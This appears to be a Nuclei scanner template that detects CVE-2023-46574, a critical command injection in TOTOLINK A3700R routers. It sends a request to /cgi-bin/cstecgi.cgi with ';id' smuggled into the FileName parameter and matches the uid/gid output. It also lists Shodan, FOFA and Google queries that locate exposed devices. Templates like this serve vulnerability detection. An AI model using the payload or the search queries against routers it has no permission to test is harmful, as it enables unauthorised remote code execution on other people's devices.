id: CVE-2023-46574 info: name: TOTOLINK A3700R - Command Injection author: DhiyaneshDk severity: critical description: | An issue in TOTOLINK A3700R v.9.1.2u.6165_20211012 allows a remote attacker to execute arbitrary code via the FileName parameter of the UploadFirmwareFile function. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-46574 - https://github.com/OraclePi/repo/blob/main/totolink%20A3700R/1/A3700R%20%20V9.1.2u.6165_20211012%20vuln.md - https://github.com/Marco-zcl/POC - https://github.com/d4n-sec/d4n-sec.github.io - https://github.com/wy876/POC classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-46574 cwe-id: CWE-77 epss-score: 0.20185 epss-percentile: 0.96341 cpe: cpe:2.3:o:totolink:a3700r_firmware:9.1.2u.6165_20211012:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: totolink product: a3700r_firmware shodan-query: - title:"Totolink" - http.title:"totolink" fofa-query: title="totolink" google-query: intitle:"totolink" tags: cve,cve2023,totolink,router,iot,rce http: - method: GET path: - "{{BaseURL}}" matchers: - type: dsl internal: true dsl: - 'status_code == 200' - 'contains(body, "TOTOLINK")' condition: and - raw: - | GET /cgi-bin/cstecgi.cgi HTTP/1.1 Host: {{Hostname}} {"topicurl":"UploadFirmwareFile","FileName":";id"} matchers-condition: and matchers: - type: regex part: body regex: - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)" - type: status status: - 200 # digest: 4a0a00473045022100960438be8181e672812559f001beb25f081c663ede398df64cafc392da90ef6e022029d6c871ffe22a626d1540c3ac88b5e9809783bbc0672eab80664a24e9540c84:922c64590222798bb761d5b6d8e72950